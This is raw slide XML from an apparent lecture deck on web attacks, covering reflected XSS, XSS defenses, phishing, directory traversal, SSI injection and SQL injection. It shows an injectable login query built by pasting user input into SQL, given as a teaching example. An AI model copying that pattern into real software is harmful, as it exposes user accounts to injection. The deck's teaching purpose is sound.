              <a:t>script&gt;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36</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2047253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XSS Attack </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Mallory finds that Bob’s site is XSS type 1 vulnerable </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Mallory makes a tampered </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>URL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to use this vulnerability and sends to Alice an email pretending to be from Bob with the tampered </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>URL </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Alice uses the tampered </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>URL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>at the same time while she is logged on Bob’s site </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The malicious script is executed in Alice browser </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Unbeknown to Alice, the script steals Alice’s confidential </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>information </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>and sends it to Mallory’s site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37</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1212380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XSS defenses </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571500" y="2132371"/>
            <a:ext cx="11861800" cy="6565900"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>– Proxy-based: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Analyze HTTP traffic between browser and web server </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Look for special HTML characters </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Encode them before executing the page on the user’s web browser </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(i.e. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>NoScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> - Firefox plugin) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>– Application-level firewall: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Analyze HTML pages for hyper links that might lead to leakage of sensitive </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>information </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stop bad requests using a set of connection rules </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>– Auditing system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="444500" lvl="1" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>• </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Monitor execution of JavaScript code and compare the operations </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="444500" lvl="1" indent="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>against high-level policies to detect malicious behavior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38</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1157262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Chapter 7: roadmap</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>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.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3982" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The World Wide Web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3982" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3982" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3982" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attacks on Clients</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3982" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3982" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3982" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attacks on Servers</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39</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1621292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78216" y="2152533"/>
            <a:ext cx="5565638" cy="6798297"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{55B28040-0FD8-C544-8357-9EE6C5A36700}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571500" y="2214433"/>
            <a:ext cx="5491924" cy="665823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charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Forged web pages created to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>fraudulently </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>acquire sensitive information </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>User typically solicited to access phished page from spam email </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Most targeted sites </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="0" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>–  Financial services (e.g., Citibank) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="0" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>–  Payment services (e.g., PayPal) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="0" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>–  Auctions (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>e..g</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>, eBay) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>45K unique phishing sites detected monthly in 2009</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>[APWG Phishing Trends Reports] </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Methods to avoid detection </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="0" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>–  Misspelled URL </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="0" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>–  URL obfuscation </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="0" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>–  Removed or forged address bar </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0" algn="ctr" defTabSz="584200" rtl="0" fontAlgn="auto" latinLnBrk="1" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
            </a:pPr>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="4200" b="0" i="0" u="none" strike="noStrike" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uFillTx/>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
              <a:sym typeface="Helvetica Neue Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1135785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Dot-Dot-Slash</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Also known as “directory traversal,” this is when attackers use the term “../” to access files that are on the target web server but not meant to be accessed from outside</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Most commonly entered into the URL bar but may also be combined with other attacks, such as XSS</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40</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Screen Shot 2015-09-06 at 4.26.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16" y="5767507"/>
            <a:ext cx="11842443" cy="778455"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="327627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Include (SSI)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SSI is an interpreted server-side scripting language that can be used for basic web server directives, such as including files and executing commands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>As is the case with XSS, some websites are vulnerable to allowing users to execute SSI directives through text input</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12202175" y="9359900"/>
            <a:ext cx="282129" cy="276999"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{5BFA158B-7C94-F543-87DB-41F59EA4FAFA}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:pPr/>
              <a:t>41</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Screen Shot 2015-09-06 at 4.2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141" y="6205963"/>
            <a:ext cx="6664960" cy="614116"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="292531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Injection Attack </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Many web applications take user input from a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>form </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Often this user input is used literally in the construction of a SQL query submitted to a database. For example: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="444500" lvl="1" indent="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SELECT user FROM table </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="889000" lvl="2" indent="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>name = ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>user_input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>’; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>An SQL injection attack involves placing SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>statements in the user input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42</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="357009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Standard Query Language </a:t>
            </a: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94" y="2196690"/>
            <a:ext cx="10979728" cy="6397498"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="193356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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571500" y="4742836"/>
            <a:ext cx="11861800" cy="2675603"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>• SELECT statement is used to select data FROM one or more tables in a database </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>• Result-set is stored in a result table</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>• WHERE clause is used to filter records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872" y="2245441"/>
            <a:ext cx="9190548" cy="2164327"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="605786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Syntax </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571500" y="6114436"/>
            <a:ext cx="11861800" cy="2218403"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>• ORDER BY is used to order data following one or more fields (columns) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>• LIMIT allows to retrieve just a certain numbers of records (rows) </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805" y="2439628"/>
            <a:ext cx="9182781" cy="3145659"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="232474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Authentication Query </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>• Standard query to authenticate users:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>* from users where user='$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>usern</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>' AND </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>='$password' </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>• Classic SQL injection attacks</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	– Server side code sets variables $user name and $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> from user input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to web form</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	– Variables passed to SQL query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
